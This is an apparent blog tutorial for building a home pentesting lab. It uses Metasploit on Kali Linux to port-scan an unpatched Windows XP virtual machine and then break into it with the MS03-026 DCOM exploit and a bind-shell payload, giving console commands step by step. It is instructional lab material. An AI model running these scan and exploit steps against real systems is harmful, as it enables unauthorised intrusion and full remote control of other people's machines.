What are you going to need
- Basic Penetration testing terms (I recommend that you take a look here, as I'm going to use the terms freely without any explanation here in this tutorial)
- The tough manual way of penetration testing (A large patch of advanced material which will help you become a great pentester if you have the patience to read it all and capability to understand it)
- VMWare tools (Without Vmware tools there is no way you can have a Kali linux (attacker machine) and unpatched XP (target machine) running at the same time in one single computer)
- Kali linux ( Click the link for a complete detailed guide)
- Windows XP (After you've followed the tutorial above for installing Kali linux, installing XP on a VM will be a piece of cake, a few screenshots of the process)
Now there is catch in Windows XP. While Kali linux is free, Windows XP is not. So you have to buy one (won't promote piracy here). Just make sure that when you are buying a Windows XP cd, it is unpatched and SP1. If it is patched then the exploits won't work. Your best bet would be to look up your shelves to find an old XP cd that you bought years ago which is catching dust, and put it to some use.
A look at Metasploit Framework
Starting the framework
"In keeping with the Kali Linux Network Services Policy, there are no network services, including database services, running on boot so there are a couple of steps that need to be taken in order to get Metasploit up and running with database support." Simply speaking, there are some services that metasploit needs which aren't started with system startup. So here's some commands you need to execute on your console before you can start metasploit
service postgresql start(Metasploit uses PostgreSQL as its database so it needs to be launched first.)
With PostgreSQL up and running, we next need to launch the metasploit service. The first time the service is launched, it will create a msf3 database user and a database called msf3. The service will also launch the Metasploit RPC and Web servers it requires.
service metasploit startUpdate : On recent versions of Kali, you can skip the above two commands, and start with the command below right away. If you are getting an error in above commands, then just skip them.
Now finally we are ready to start metasploit framework.
Looking at the targetsRight now, my metasploit framework is running on Kali on Vmware on a Windows 8 machine. Also, there is a Windows XP Sp3 virtual machine running side my side with my Kali. So what we need to do is detect these machines in Metasploit framework. For this we'll do a port scan.
Metasploit offers an awesome port scanning function which goes by the name auxiliary scanner. Here is the command to execute this scan
To use this feature, enter the following code-
use auxiliary/scanner/portscan/tcpType show options to see the available options
show optionsNow we have to change a few settings, firstly, we should reduce the number of ports scanned
set ports 1-500Secondly, we have to specify a target IP to scan. Now this is a bit tricky, as the IP is not going to be the same in all cases. So here's what you'll do. Go to your XP virtual machine (the one you are trying to hack). Open command prompt and type
ipconfigIn the results, check the IP of the machine. This is what you'll have to specify the RHOSTS option as.
In my case the IP is 192.168.63.131
Now go back to your Kali machine, and type the fol (change the IP as required)
set RHOST 192.168.63.131Here's what it should look like
|There's a slight error here, I spelled RHOSTS wrong. Make sure you add the 's' in the end.|
Now we are ready for some action, do a show options again to see what all changes you've made. Finally, type-
runThe scan will start and after some time it will show you which tcp ports are open and vulnerable to attack.
If you had not been using an unpatched version of Windows, there will not be any vulnerable ports.
I got 3 open ports this time. If you are using some higher XP version, you too might need to disable firewall in order to get open ports.
Now we know we have a target at IP 192.168.63.131 and it has port 135 139 and 445 open.
Real life port scanIn actual pentesting environment, you don't know about the IP, open ports and OS of the target computer. In such cases, we can use Nmap port scanner which is much better than auxiliary. We'll come to that later.
Finding ExploitsThis step is important. We need to figure out which exploits work on the OS we are attacking. In our case, we already know what to do. Type back to get out of auxiliary scanner. Search for dcom on msfconsole.
search dcomThis is a very famous exploit for Windows.
use exploit/windows/dcerpc/ms03_026_dcomYou are now using the most famous Windows exploit. Type show options again
show optionsAgain, set the RHOST as 192.168.63.131 (replace with the IP of your target)
set RHOST 192.168.63.131Also, set a payload.
set PAYLOAD windows/shell_bind_tcp
And here's the best part
You have now successfully broken into the target computer. You have an open shell on the target computer with administrator privileges. In short, you own that computer now. Try out what all you can do from here on. I'll come up with more in the next tutorial.
Update - The next tutorial is here. It discusses the post exploitation fun that you can have with the meterpreter payload. Post exploitation fun in an exploited xp machine
We have a pentesting lab now and have successfully exploited an XP machine.